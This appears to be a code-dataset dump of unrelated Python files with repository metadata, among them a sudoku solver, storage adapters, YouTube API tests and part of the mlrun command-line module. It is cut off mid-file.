rsjson.get("position").get("orientation") if math.hypot(dx, dy) < 0.1 and abs(dyaw) < 10: print("Distanse is short enough. {}, {}, {}".format(dx, dy, dyaw)) return True else: return False @Request(method="get", path="/maps") def get_maps(self): pass @Request(method="get", path="/maps") def get_map(self, map_name): if not self.is_valid_guid(map_name): map_guid = self.get_map_guid(map_name) if map_guid is None: warnings.warn("No this map: {}".format(map_name)) return return {"PATH": "/" + map_guid} def get_map_guid(self, map_name): r = self.get_maps() rjson = json.loads(r.text) for l in rjson: if l.get("name") == map_name: return l.get("guid") print("No this position") return None def save_map(self, map_name=MAP_NAME, saved_name=None, \ saved_path=os.path.dirname(os.path.abspath(__file__))+"/maps/"): if saved_name is None: t = time.localtime() timestamp = time.strftime('%b-%d-%Y_%H%M', t) saved_name = (map_name + "-" + timestamp + ".png") r = self.get_map(map_name) rjson = json.loads(r.text) bMap = rjson.get("map") print(bMap) if not os.path.exists(saved_path): os.mkdir(saved_path) print("Directory " , saved_path, " Created ") with open(saved_path + saved_name, "wb") as fh: fh.write(base64.b64decode(bMap)) print("[INFO] Saved {} map in {}".format(map_name, saved_path))
34.284264
141
0.543826
00442a83cd9868d14beb379932132749df0977b3
980
py
Python
pypipe/lib/controls/file.py
AGrigis/pypipe
a77fc2c81cb469535b650c79718f811c5c056238
[ "CECILL-B" ]
null
null
null
pypipe/lib/controls/file.py
AGrigis/pypipe
a77fc2c81cb469535b650c79718f811c5c056238
[ "CECILL-B" ]
null
null
null
pypipe/lib/controls/file.py
AGrigis/pypipe
a77fc2c81cb469535b650c79718f811c5c056238
[ "CECILL-B" ]
null
null
null
########################################################################## # PyPipe - Copyright (C) AGrigis, 2017 # Distributed under the terms of the CeCILL-B license, as published by # the CEA-CNRS-INRIA. Refer to the LICENSE file or to # http://www.cecill.info/licences/Licence_CeCILL-B_V1-en.html # for details. ########################################################################## # System import import os # Package import from .base import Base class File(Base): """ Define a file parameter. """ def _is_valid(self, value): """ A method used to check if the value is a file name. Parameters ---------- value: str (mandatory) a file name. Returns ------- is_valid: bool return True if the value is a file, False otherwise. """ if isinstance(value, str) and os.path.isfile(value): return True else: return False
26.486486
74
0.496939
5caa73d1f26cf37ca475c4d850c4bbad9194da5c
1,062
py
Python
opteryx/storage/adapters/local/disk_store.py
mabel-dev/waddles
959653ac7a66f1035e90085fc036fe7b0a1e57db
[ "Apache-2.0" ]
null
null
null
opteryx/storage/adapters/local/disk_store.py
mabel-dev/waddles
959653ac7a66f1035e90085fc036fe7b0a1e57db
[ "Apache-2.0" ]
null
null
null
opteryx/storage/adapters/local/disk_store.py
mabel-dev/waddles
959653ac7a66f1035e90085fc036fe7b0a1e57db
[ "Apache-2.0" ]
null
null
null
# Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import os from opteryx.storage import BaseStorageAdapter class DiskStorage(BaseStorageAdapter): def __init__(self): pass def read_blob(self, blob_name): import io with open(blob_name, "rb") as blob: # wrap in a BytesIO so we can close the file return io.BytesIO(blob.read()) def get_blob_list(self, partition): import glob files = glob.glob(str(partition / "**"), recursive=True) return [f for f in files if os.path.isfile(f)]
32.181818
74
0.699623
356718cf26860a04d368a8e52a4dd33966b7d392
965
py
Python
Products/CMFDefault/browser/membership/tests/test_authentication.py
zopefoundation/Products.CMFDefault
a176d9aac5a7e04725dbd0f7b76c6ac357062139
[ "ZPL-2.1" ]
null
null
null
Products/CMFDefault/browser/membership/tests/test_authentication.py
zopefoundation/Products.CMFDefault
a176d9aac5a7e04725dbd0f7b76c6ac357062139
[ "ZPL-2.1" ]
5
2017-07-13T00:51:25.000Z
2021-02-04T15:08:39.000Z
Products/CMFDefault/browser/membership/tests/test_authentication.py
zopefoundation/Products.CMFDefault
a176d9aac5a7e04725dbd0f7b76c6ac357062139
[ "ZPL-2.1" ]
3
2017-07-08T03:22:35.000Z
2018-05-20T06:42:03.000Z
############################################################################## # # Copyright (c) 2010 Zope Foundation and Contributors. # # This software is subject to the provisions of the Zope Public License, # Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution. # THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED # WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED # WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS # FOR A PARTICULAR PURPOSE. # ############################################################################## """ Test Products.CMFDefault.browser.authentication """ import unittest from Testing import ZopeTestCase from Products.CMFDefault.testing import FunctionalLayer ftest_suite = ZopeTestCase.FunctionalDocFileSuite('authentication.txt') ftest_suite.layer = FunctionalLayer def test_suite(): return unittest.TestSuite(( ftest_suite, ))
33.275862
78
0.648705
5d258d5bf9ec4eaf286e61afb3b5ca967b6d188c
1,388
py
Python
py/solns/sudokuSolver/sudokuSolver.py
zcemycl/algoTest
9518fb2b60fd83c85aeb2ab809ff647aaf643f0a
[ "MIT" ]
1
2022-01-26T16:33:45.000Z
2022-01-26T16:33:45.000Z
py/solns/sudokuSolver/sudokuSolver.py
zcemycl/algoTest
9518fb2b60fd83c85aeb2ab809ff647aaf643f0a
[ "MIT" ]
null
null
null
py/solns/sudokuSolver/sudokuSolver.py
zcemycl/algoTest
9518fb2b60fd83c85aeb2ab809ff647aaf643f0a
[ "MIT" ]
1
2022-01-26T16:35:44.000Z
2022-01-26T16:35:44.000Z
from collections import defaultdict class Solution: @staticmethod def naive(board): n = len(board) rows = defaultdict(set) cols = defaultdict(set) sqs = defaultdict(set) for r in range(n): for c in range(n): if board[r][c]!=".": tmp = board[r][c] rows[r].add(tmp) cols[c].add(tmp) sqs[r//3*3+c//3].add(tmp) def valid(r,c,v): return v not in rows[r] and v not in cols[c] and \ v not in sqs[r//3*3+c//3] def recursive(r,c): if r==n-1 and c==n: return True elif c==n: c=0 r+=1 if board[r][c]!=".": return recursive(r,c+1) sqid = r//3*3+c//3 for v in range(1,10): tmp = str(v) if not valid(r,c,tmp): continue board[r][c] = tmp rows[r].add(tmp) cols[c].add(tmp) sqs[sqid].add(tmp) if recursive(r,c+1): return True board[r][c] = "." rows[r].remove(tmp) cols[c].remove(tmp) sqs[sqid].remove(tmp) return False recursive(0,0)
29.531915
62
0.386167
7ac7d89b06a3a3e1084aeb5b443022d63ebff43e
4,093
py
Python
foxylib/tools/googleapi/youtube/data/tests/test_dataapi_tool.py
foxytrixy-com/foxylib
94b8c5b9f8b12423393c68f7d9f910258840ed18
[ "BSD-3-Clause" ]
null
null
null
foxylib/tools/googleapi/youtube/data/tests/test_dataapi_tool.py
foxytrixy-com/foxylib
94b8c5b9f8b12423393c68f7d9f910258840ed18
[ "BSD-3-Clause" ]
null
null
null
foxylib/tools/googleapi/youtube/data/tests/test_dataapi_tool.py
foxytrixy-com/foxylib
94b8c5b9f8b12423393c68f7d9f910258840ed18
[ "BSD-3-Clause" ]
null
null
null
import logging import os from functools import reduce from pprint import pprint from unittest import TestCase from google_auth_oauthlib.flow import InstalledAppFlow from googleapiclient.discovery import build import pytest from googleapiclient.http import MediaFileUpload from foxylib.tools.collections.iter_tool import IterTool from foxylib.tools.googleapi.foxylib_googleapi import FoxylibGoogleapi from foxylib.tools.googleapi.youtube.data.dataapi_tool import DataapiTool, LiveStreamingData from foxylib.tools.googleapi.youtube.youtubeapi_tool import YoutubeapiTool from foxylib.tools.log.foxylib_logger import FoxylibLogger FILE_PATH = os.path.realpath(__file__) REPO_DIR = reduce(lambda x, f: f(x), [os.path.dirname] * 7, FILE_PATH) class TestNative(TestCase): @pytest.mark.skip(reason="upload slow. too much quota (1600)") def test_1_upload(self): # https://www.youtube.com/watch?v=CxRIcOLLWZk logger = FoxylibLogger.func_level2logger(self.test_1_upload, logging.DEBUG) # video_id = 'ePnWBJnj7C0' credentials = FoxylibGoogleapi.ServiceAccount.credentials( scopes=["https://www.googleapis.com/auth/youtube.upload"], ) # str_SCOPE = "drive.readonly" # creds = GSSTool.username_scope2creds(FoxylibGoogleapi.OAuth.username(), str_SCOPE) # service = build('drive', 'v3', http=creds.authorize(Http()), cache_discovery=False) youtube_service = YoutubeapiTool.credentials2service(credentials) request = youtube_service.videos().insert( part="snippet,status", body={ "snippet": { "categoryId": "22", "description": "Description of uploaded video.", "title": "Test video upload.", # 'liveBroadcastContent':'upcoming', }, "status": { "privacyStatus": "private", } }, # TODO: For this request to work, you must replace "YOUR_FILE" # with a pointer to the actual file you are uploading. media_body=MediaFileUpload("/Users/moonyoungkang/Downloads/lightning.mp4") ) response = request.execute() print(response) class TestDataapiTool(TestCase): @classmethod def setUpClass(cls): FoxylibLogger.attach_stderr2loggers(logging.DEBUG) @pytest.mark.skip(reason='"activeLiveChatId" seems to have TTL. disappeared after not using for long time') def test_01(self): # https://www.youtube.com/watch?v=nHRKoNOQ56w logger = FoxylibLogger.func_level2logger(self.test_01, logging.DEBUG) video_id = 'SXfFccUDK68' credentials = FoxylibGoogleapi.ServiceAccount.credentials() youtube_service = YoutubeapiTool.credentials2service(credentials) data = DataapiTool.video_id2live_streaming_data(video_id, youtube_service) logger.debug({'data':data}) chat_id = LiveStreamingData.data2chat_id(data) # ref = 'Cg0KC25IUktvTk9RNTZ3KicKGFVDbXJscUZJS19RUUNzcjNGUkhhM09LdxILbkhSS29OT1E1Nnc' ref = 'Cg0KC1NYZkZjY1VESzY4KicKGFVDYVlIYkVkcHJ1VFd5QkwxV0xHSHRidxILU1hmRmNjVURLNjg' self.assertEqual(chat_id, ref) # ptah-dev # livestream data @pytest.mark.skip(reason="'video_id' keep changing") def test_02(self): # https://www.youtube.com/watch?v=CxRIcOLLWZk logger = FoxylibLogger.func_level2logger(self.test_02, logging.DEBUG) video_id = 'ePnWBJnj7C0' credentials = FoxylibGoogleapi.ServiceAccount.credentials() youtube_service = YoutubeapiTool.credentials2service(credentials) data = DataapiTool.video_id2live_streaming_data(video_id, youtube_service) chat_id = LiveStreamingData.data2chat_id(data) # logger.debug({'chat_id':chat_id}) # ref = 'Cg0KC0N4UkljT0xMV1prKicKGFVDTDI5X1pkaENHV3pjMTZ1NW04S19VURILQ3hSSWNPTExXWms' ref = 'Cg0KC2VQbldCSm5qN0MwKicKGFVDTDI5X1pkaENHV3pjMTZ1NW04S19VURILZVBuV0JKbmo3QzA' self.assertEqual(chat_id, ref)
40.524752
111
0.699243
4e85671c20826847b14ed12f241c3f4fc8fd2c61
32,312
py
Python
mlrun/__main__.py
adiso75/mlrun
0da2e72a1e2aa189074bd2ec059f2bc452f349cf
[ "Apache-2.0" ]
null
null
null
mlrun/__main__.py
adiso75/mlrun
0da2e72a1e2aa189074bd2ec059f2bc452f349cf
[ "Apache-2.0" ]
null
null
null
mlrun/__main__.py
adiso75/mlrun
0da2e72a1e2aa189074bd2ec059f2bc452f349cf
[ "Apache-2.0" ]
null
null
null
#!/usr/bin/env python # Copyright 2018 Iguazio # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import json import traceback from ast import literal_eval from base64 import b64decode, b64encode from os import environ, path from pprint import pprint from subprocess import Popen from sys import executable import click import yaml from tabulate import tabulate import mlrun from .builder import upload_tarball from .config import config as mlconf from .db import get_run_db from .k8s_utils import K8sHelper from .model import RunTemplate from .platforms import auto_mount as auto_mount_modifier from .projects import load_project from .run import get_object, import_function, import_function_to_dict, new_function from .runtimes import RemoteRuntime, RunError, RuntimeKinds, ServingRuntime from .secrets import SecretsStore from .utils import ( RunNotifications, dict_to_yaml, get_in, list2dict, logger, parse_versioned_object_uri, run_keys, update_in, ) from .utils.version import Version @click.group() def main(): pass @main.command(context_settings=dict(ignore_unknown_options=True)) @click.argument("url", type=str, required=False) @click.option( "--param", "-p", default="", multiple=True, help="parameter name and value tuples, e.g. -p x=37 -p y='text'", ) @click.option("--inputs", "-i", multiple=True, help="input artifact") @click.option("--outputs", "-o", multiple=True, help="output artifact/result for kfp") @click.option("--in-path", help="default input path/url (prefix) for artifact") @click.option("--out-path", help="default output path/url (prefix) for artifact") @click.option( "--secrets", "-s", multiple=True, help="secrets file=<filename> or env=ENV_KEY1,.." ) @click.option("--uid", help="unique run ID") @click.option("--name", help="run name") @click.option("--workflow", help="workflow name/id") @click.option("--project", help="project name/id") @click.option("--db", default="", help="save run results to path or DB url") @click.option( "--runtime", "-r", default="", help="function spec dict, for pipeline usage" ) @click.option( "--kfp", is_flag=True, help="running inside Kubeflow Piplines, do not use" ) @click.option( "--hyperparam", "-x", default="", multiple=True, help="hyper parameters (will expand to multiple tasks) e.g. --hyperparam p2=[1,2,3]", ) @click.option( "--param-file", default="", help="path to csv table of execution (hyper) params" ) @click.option( "--selector", default="", help="how to select the best result from a list, e.g. max.accuracy", ) @click.option( "--hyper-param-strategy", default="", help="hyperparam tuning strategy list | grid | random", ) @click.option( "--hyper-param-options", default="", help="hyperparam options json string", ) @click.option( "--func-url", "-f", default="", help="path/url of function yaml or function " "yaml or db://<project>/<name>[:tag]", ) @click.option("--task", default="", help="path/url to task yaml") @click.option( "--handler", default="", help="invoke function handler inside the code file" ) @click.option("--mode", help="special run mode noctx | pass") @click.option("--schedule", help="cron schedule") @click.option("--from-env", is_flag=True, help="read the spec from the env var") @click.option("--dump", is_flag=True, help="dump run results as YAML") @click.option("--image", default="", help="container image") @click.option("--kind", default="", help="serverless runtime kind") @click.option("--source", default="", help="source code archive/git") @click.option("--local", is_flag=True, help="run the task locally (ignore runtime)") @click.option( "--auto-mount", is_flag=True, help="add volume mount to job using auto mount option" ) @click.option("--workdir", default="", help="run working directory") @click.option("--label", multiple=True, help="run labels (key=val)") @click.option("--watch", "-w", is_flag=True, help="watch/tail run log") @click.option("--verbose", is_flag=True, help="verbose log") @click.option( "--scrape-metrics", is_flag=True, help="whether to add the `mlrun/scrape-metrics` label to this run's resources", ) @click.argument("run_args", nargs=-1, type=click.UNPROCESSED) def run( url, param, inputs, outputs, in_path, out_path, secrets, uid, name, workflow, project, db, runtime, kfp, hyperparam, param_file, selector, hyper_param_strategy, hyper_param_options, func_url, task, handler, mode, schedule, from_env, dump, image, kind, source, local, auto_mount, workdir, label, watch, verbose, scrape_metrics, run_args, ): """Execute a task and inject parameters.""" out_path = out_path or environ.get("MLRUN_ARTIFACT_PATH") config = environ.get("MLRUN_EXEC_CONFIG") if from_env and config: config = json.loads(config) runobj = RunTemplate.from_dict(config) elif task: obj = get_object(task) task = yaml.load(obj, Loader=yaml.FullLoader) runobj = RunTemplate.from_dict(task) else: runobj = RunTemplate() set_item(runobj.metadata, uid, "uid") set_item(runobj.metadata, name, "name") set_item(runobj.metadata, project, "project") if label: label_dict = list2dict(label) for k, v in label_dict.items(): runobj.metadata.labels[k] = v if workflow: runobj.metadata.labels["workflow"] = workflow if db: mlconf.dbpath = db if func_url or kind or image: if func_url: runtime = func_url_to_runtime(func_url) kind = get_in(runtime, "kind", kind or "job") if runtime is None: exit(1) else: kind = kind or "job" runtime = {"kind": kind, "spec": {"image": image}} if kind not in ["", "local", "dask"] and url: if path.isfile(url) and url.endswith(".py"): with open(url) as fp: body = fp.read() based = b64encode(body.encode("utf-8")).decode("utf-8") logger.info(f"packing code at {url}") update_in(runtime, "spec.build.functionSourceCode", based) url = "" update_in(runtime, "spec.command", "") elif runtime: runtime = py_eval(runtime) if not isinstance(runtime, dict): print(f"runtime parameter must be a dict, not {type(runtime)}") exit(1) else: runtime = {} code = environ.get("MLRUN_EXEC_CODE") if get_in(runtime, "kind", "") == "dask": code = get_in(runtime, "spec.build.functionSourceCode", code) if from_env and code: code = b64decode(code).decode("utf-8") if kfp: print(f"code:\n{code}\n") with open("main.py", "w") as fp: fp.write(code) url = url or "main.py" if url: if not name and not runtime: name = path.splitext(path.basename(url))[0] runobj.metadata.name = runobj.metadata.name or name update_in(runtime, "spec.command", url) if run_args: update_in(runtime, "spec.args", list(run_args)) if image: update_in(runtime, "spec.image", image) set_item(runobj.spec, handler, "handler") set_item(runobj.spec, param, "parameters", fill_params(param)) set_item(runobj.spec, hyperparam, "hyperparams", fill_params(hyperparam)) if hyper_param_options: runobj.spec.hyper_param_options = py_eval(hyper_param_options) set_item(runobj.spec.hyper_param_options, param_file, "param_file") set_item(runobj.spec.hyper_param_options, hyper_param_strategy, "strategy") set_item(runobj.spec.hyper_param_options, selector, "selector") set_item(runobj.spec, inputs, run_keys.inputs, list2dict(inputs)) set_item(runobj.spec, in_path, run_keys.input_path) set_item(runobj.spec, out_path, run_keys.output_path) set_item(runobj.spec, outputs, run_keys.outputs, list(outputs)) set_item( runobj.spec, secrets, run_keys.secrets, line2keylist(secrets, "kind", "source") ) set_item(runobj.spec, verbose, "verbose") set_item(runobj.spec, scrape_metrics, "scrape_metrics") update_in(runtime, "metadata.name", name, replace=False) update_in(runtime, "metadata.project", project, replace=False) if kfp or runobj.spec.verbose or verbose: print(f"MLRun version: {str(Version().get())}") print("Runtime:") pprint(runtime) print("Run:") pprint(runobj.to_dict()) try: fn = new_function(runtime=runtime, kfp=kfp, mode=mode) if workdir: fn.spec.workdir = workdir if auto_mount: fn.apply(auto_mount_modifier()) if source: supported_runtimes = [ "", "local", RuntimeKinds.job, RuntimeKinds.remotespark, ] if fn.kind not in supported_runtimes: print( f"source flag only works with the {','.join(supported_runtimes)} runtimes" ) exit(1) fn.spec.build.source = source fn.spec.build.load_source_on_run = True fn.is_child = from_env and not kfp resp = fn.run(runobj, watch=watch, schedule=schedule, local=local) if resp and dump: print(resp.to_yaml()) except RunError as err: print(f"runtime error: {err}") exit(1) @main.command(context_settings=dict(ignore_unknown_options=True)) @click.argument("func_url", type=str, required=False) @click.option("--name", help="function name") @click.option("--project", help="project name") @click.option("--tag", default="", help="function tag") @click.option("--image", "-i", help="target image path") @click.option( "--source", "-s", default="", help="location/url of the source files dir/tar" ) @click.option("--base-image", "-b", help="base docker image") @click.option( "--command", "-c", default="", multiple=True, help="build commands, e.g. '-c pip install pandas'", ) @click.option("--secret-name", default="", help="container registry secret name") @click.option("--archive", "-a", default="", help="destination archive for code (tar)") @click.option("--silent", is_flag=True, help="do not show build logs") @click.option("--with-mlrun", is_flag=True, help="add MLRun package") @click.option("--db", default="", help="save run results to path or DB url") @click.option( "--runtime", "-r", default="", help="function spec dict, for pipeline usage" ) @click.option( "--kfp", is_flag=True, help="running inside Kubeflow Piplines, do not use" ) @click.option("--skip", is_flag=True, help="skip if already deployed") def build( func_url, name, project, tag, image, source, base_image, command, secret_name, archive, silent, with_mlrun, db, runtime, kfp, skip, ): """Build a container image from code and requirements.""" if db: mlconf.dbpath = db if runtime: runtime = py_eval(runtime) if not isinstance(runtime, dict): print(f"runtime parameter must be a dict, not {type(runtime)}") exit(1) if kfp: print("Runtime:") pprint(runtime) func = new_function(runtime=runtime) elif func_url.startswith("db://"): func_url = func_url[5:] func = import_function(func_url) elif func_url: func_url = "function.yaml" if func_url == "." else func_url func = import_function(func_url) else: print("please specify the function path or url") exit(1) meta = func.metadata meta.project = project or meta.project or mlconf.default_project meta.name = name or meta.name meta.tag = tag or meta.tag b = func.spec.build if func.kind not in ["", "local"]: b.base_image = base_image or b.base_image b.commands = list(command) or b.commands b.image = image or b.image b.secret = secret_name or b.secret if source.endswith(".py"): if not path.isfile(source): print(f"source file doesnt exist ({source})") exit(1) with open(source) as fp: body = fp.read() based = b64encode(body.encode("utf-8")).decode("utf-8") logger.info(f"packing code at {source}") b.functionSourceCode = based func.spec.command = "" else: b.source = source or b.source # todo: upload stuff archive = archive or mlconf.default_archive if archive: src = b.source or "./" logger.info(f"uploading data from {src} to {archive}") target = archive if archive.endswith("/") else archive + "/" target += f"src-{meta.project}-{meta.name}-{meta.tag or 'latest'}.tar.gz" upload_tarball(src, target) # todo: replace function.yaml inside the tar b.source = target if hasattr(func, "deploy"): logger.info("remote deployment started") try: func.deploy( with_mlrun=with_mlrun, watch=not silent, is_kfp=kfp, skip_deployed=skip ) except Exception as err: print(f"deploy error, {err}") exit(1) state = func.status.state image = func.spec.image if kfp: with open("/tmp/state", "w") as fp: fp.write(state or "none") full_image = func.full_image_path(image) or "" with open("/tmp/image", "w") as fp: fp.write(image) with open("/tmp/fullimage", "w") as fp: fp.write(full_image) print("full image path = ", full_image) print(f"function built, state={state} image={image}") else: print("function does not have a deploy() method") exit(1) @main.command(context_settings=dict(ignore_unknown_options=True)) @click.argument("spec", type=str, required=False) @click.option("--source", "-s", default="", help="location/url of the source") @click.option( "--func-url", "-f", default="", help="path/url of function yaml or function " "yaml or db://<project>/<name>[:tag]", ) @click.option("--dashboard", "-d", default="", help="nuclio dashboard url") @click.option("--project", "-p", default="", help="project name") @click.option("--model", "-m", multiple=True, help="model name and path (name=path)") @click.option("--kind", "-k", default=None, help="runtime sub kind") @click.option("--tag", default="", help="version tag") @click.option("--env", "-e", multiple=True, help="environment variables") @click.option("--verbose", is_flag=True, help="verbose log") def deploy(spec, source, func_url, dashboard, project, model, tag, kind, env, verbose): """Deploy model or function""" if func_url: runtime = func_url_to_runtime(func_url) if runtime is None: exit(1) elif spec: runtime = py_eval(spec) else: runtime = {} if not isinstance(runtime, dict): print(f"runtime parameter must be a dict, not {type(runtime)}") exit(1) if verbose: pprint(runtime) pprint(model) # support both v1 & v2+ model struct for backwards compatibility if runtime and runtime["kind"] == RuntimeKinds.serving: print("Deploying V2 model server") function = ServingRuntime.from_dict(runtime) if model: # v2+ model struct (list of json obj) for _model in model: args = json.loads(_model) function.add_model(**args) else: function = RemoteRuntime.from_dict(runtime) if kind: function.spec.function_kind = kind if model: # v1 model struct (list of k=v) models = list2dict(model) for k, v in models.items(): function.add_model(k, v) function.spec.source = source if env: for k, v in list2dict(env).items(): function.set_env(k, v) function.verbose = verbose try: addr = function.deploy(dashboard=dashboard, project=project, tag=tag) except Exception as err: print(f"deploy error: {err}") exit(1) print(f"function deployed, address={addr}") with open("/tmp/output", "w") as fp: fp.write(addr) with open("/tmp/name", "w") as fp: fp.write(function.status.nuclio_name) @main.command(context_settings=dict(ignore_unknown_options=True)) @click.argument("pod", type=str) @click.option("--namespace", "-n", help="kubernetes namespace") @click.option( "--timeout", "-t", default=600, show_default=True, help="timeout in seconds" ) def watch(pod, namespace, timeout): """Read current or previous task (pod) logs.""" k8s = K8sHelper(namespace) status = k8s.watch(pod, namespace, timeout) print(f"Pod {pod} last status is: {status}") @main.command(context_settings=dict(ignore_unknown_options=True)) @click.argument("kind", type=str) @click.argument("name", type=str, default="", required=False) @click.option("--selector", "-s", default="", help="label selector") @click.option("--namespace", "-n", help="kubernetes namespace") @click.option("--uid", help="unique ID") @click.option("--project", "-p", help="project name") @click.option("--tag", "-t", default="", help="artifact/function tag") @click.option("--db", help="db path/url") @click.argument("extra_args", nargs=-1, type=click.UNPROCESSED) def get(kind, name, selector, namespace, uid, project, tag, db, extra_args): """List/get one or more object per kind/class.""" if db: mlconf.dbpath = db if kind.startswith("po"): k8s = K8sHelper(namespace) if name: resp = k8s.get_pod(name, namespace) print(resp) return items = k8s.list_pods(namespace, selector) print(f"{'state':10} {'started':16} {'type':8} name") for i in items: task = i.metadata.labels.get("mlrun/class", "") if task: name = i.metadata.name state = i.status.phase start = "" if i.status.start_time: start = i.status.start_time.strftime("%b %d %H:%M:%S") print(f"{state:10} {start:16} {task:8} {name}") elif kind.startswith("runtime"): run_db = get_run_db(db or mlconf.dbpath) if name: # the runtime identifier is its kind runtime = run_db.get_runtime(kind=name, label_selector=selector) print(dict_to_yaml(runtime)) return runtimes = run_db.list_runtimes(label_selector=selector) print(dict_to_yaml(runtimes)) elif kind.startswith("run"): run_db = get_run_db() if name: run = run_db.read_run(name, project=project) print(dict_to_yaml(run)) return runs = run_db.list_runs(uid=uid, project=project, labels=selector) df = runs.to_df()[ ["name", "uid", "iter", "start", "state", "parameters", "results"] ] # df['uid'] = df['uid'].apply(lambda x: f'..{x[-6:]}') df["start"] = df["start"].apply(time_str) df["parameters"] = df["parameters"].apply(dict_to_str) df["results"] = df["results"].apply(dict_to_str) print(tabulate(df, headers="keys")) elif kind.startswith("art"): run_db = get_run_db() artifacts = run_db.list_artifacts( name, project=project, tag=tag, labels=selector ) df = artifacts.to_df()[ ["tree", "key", "iter", "kind", "path", "hash", "updated"] ] df["tree"] = df["tree"].apply(lambda x: f"..{x[-8:]}") df["hash"] = df["hash"].apply(lambda x: f"..{x[-6:]}") print(tabulate(df, headers="keys")) elif kind.startswith("func"): run_db = get_run_db() if name: f = run_db.get_function(name, project=project, tag=tag) print(dict_to_yaml(f)) return functions = run_db.list_functions(name, project=project, labels=selector) lines = [] headers = ["kind", "state", "name:tag", "hash"] for f in functions: name = get_in(f, "metadata.name") tag = get_in(f, "metadata.tag", "") line = [ get_in(f, "kind", ""), get_in(f, "status.state", ""), f"{name}:{tag}", get_in(f, "metadata.hash", ""), ] lines.append(line) print(tabulate(lines, headers=headers)) else: print( "currently only get pods | runs | artifacts | func [name] | runtime are supported" ) @main.command() @click.option("--port", "-p", help="port to listen on", type=int) @click.option("--dirpath", "-d", help="database directory (dirpath)") def db(port, dirpath): """Run HTTP api/database server""" env = environ.copy() if port is not None: env["MLRUN_httpdb__port"] = str(port) if dirpath is not None: env["MLRUN_httpdb__dirpath"] = dirpath cmd = [executable, "-m", "mlrun.api.main"] child = Popen(cmd, env=env) returncode = child.wait() if returncode != 0: raise SystemExit(returncode) @main.command() def version(): """get mlrun version""" print(f"MLRun version: {str(Version().get())}") @main.command() @click.argument("uid", type=str) @click.option("--project", "-p", help="project name") @click.option("--offset", type=int, default=0, help="byte offset") @click.option("--db", help="api and db service path/url") @click.option("--watch", "-w", is_flag=True, help="watch/follow log") def logs(uid, project, offset, db, watch): """Get or watch task logs""" mldb = get_run_db(db or mlconf.dbpath) if mldb.kind == "http": state = mldb.watch_log(uid, project, watch=watch, offset=offset) else: state, text = mldb.get_log(uid, project, offset=offset) if text: print(text.decode()) if state: print(f"final state: {state}") @main.command() @click.argument("context", default="", type=str, required=False) @click.option("--name", "-n", help="project name") @click.option("--url", "-u", help="remote git or archive url") @click.option("--run", "-r", help="run workflow name of .py file") @click.option( "--arguments", "-a", default="", multiple=True, help="Kubeflow pipeline arguments name and value tuples, e.g. -a x=6", ) @click.option("--artifact-path", "-p", help="output artifacts path") @click.option( "--param", "-x", default="", multiple=True, help="mlrun project parameter name and value tuples, e.g. -p x=37 -p y='text'", ) @click.option( "--secrets", "-s", multiple=True, help="secrets file=<filename> or env=ENV_KEY1,.." ) @click.option("--namespace", help="k8s namespace") @click.option("--db", help="api and db service path/url") @click.option("--init-git", is_flag=True, help="for new projects init git context") @click.option( "--clone", "-c", is_flag=True, help="force override/clone the context dir" ) @click.option("--sync", is_flag=True, help="sync functions into db") @click.option( "--watch", "-w", is_flag=True, help="wait for pipeline completion (with -r flag)" ) @click.option("--dirty", "-d", is_flag=True, help="allow git with uncommited changes") @click.option("--git-repo", help="git repo (org/repo) for git comments") @click.option( "--git-issue", type=int, default=None, help="git issue number for git comments" ) def project( context, name, url, run, arguments, artifact_path, param, secrets, namespace, db, init_git, clone, sync, watch, dirty, git_repo, git_issue, ): """load and/or run a project""" if db: mlconf.dbpath = db proj = load_project(context, url, name, init_git=init_git, clone=clone) url_str = " from " + url if url else "" print(f"Loading project {proj.name}{url_str} into {context}:\n") if artifact_path and not ("://" in artifact_path or artifact_path.startswith("/")): artifact_path = path.abspath(artifact_path) if param: proj.params = fill_params(param, proj.params) if git_repo: proj.params["git_repo"] = git_repo if git_issue: proj.params["git_issue"] = git_issue commit = ( proj.params.get("commit") or environ.get("GITHUB_SHA") or environ.get("CI_COMMIT_SHA") ) if commit: proj.params["commit"] = commit if secrets: secrets = line2keylist(secrets, "kind", "source") proj._secrets = SecretsStore.from_list(secrets) print(proj.to_yaml()) if run: workflow_path = None if run.endswith(".py"): workflow_path = run run = None args = None if arguments: args = fill_params(arguments) print(f"running workflow {run} file: {workflow_path}") message = run = "" had_error = False try: run = proj.run( run, workflow_path, arguments=args, artifact_path=artifact_path, namespace=namespace, sync=sync, dirty=dirty, ) except Exception as exc: print(traceback.format_exc()) message = f"failed to run pipeline, {exc}" had_error = True print(message) print(f"run id: {run}") gitops = ( git_issue or environ.get("GITHUB_EVENT_PATH") or environ.get("CI_MERGE_REQUEST_IID") ) n = RunNotifications(with_slack=True, secrets=proj._secrets).print() if gitops: n.git_comment(git_repo, git_issue, token=proj.get_secret("GITHUB_TOKEN")) if not had_error: n.push_start_message(proj.name, commit, run) else: n.push(message) if had_error: exit(1) if watch: proj.get_run_status(run, notifiers=n) elif sync: print("saving project functions to db ..") proj.sync_functions(save=True) def validate_kind(ctx, param, value): possible_kinds = RuntimeKinds.runtime_with_handlers() if value is not None and value not in possible_kinds: raise click.BadParameter( f"kind must be one of {possible_kinds}", ctx=ctx, param=param ) return value @main.command() @click.argument("kind", callback=validate_kind, default=None, required=False) @click.argument("object_id", metavar="id", type=str, default=None, required=False) @click.option("--api", help="api service url") @click.option("--label-selector", "-ls", default="", help="label selector") @click.option( "--force", "-f", is_flag=True, help="clean resources in non-terminal states as well" ) @click.option( "--grace-period", "-gp", type=int, # When someone triggers the cleanup manually we assume they want runtime resources in terminal state to be removed # now, therefore not using here mlconf.runtime_resources_deletion_grace_period default=0, help="the grace period (in 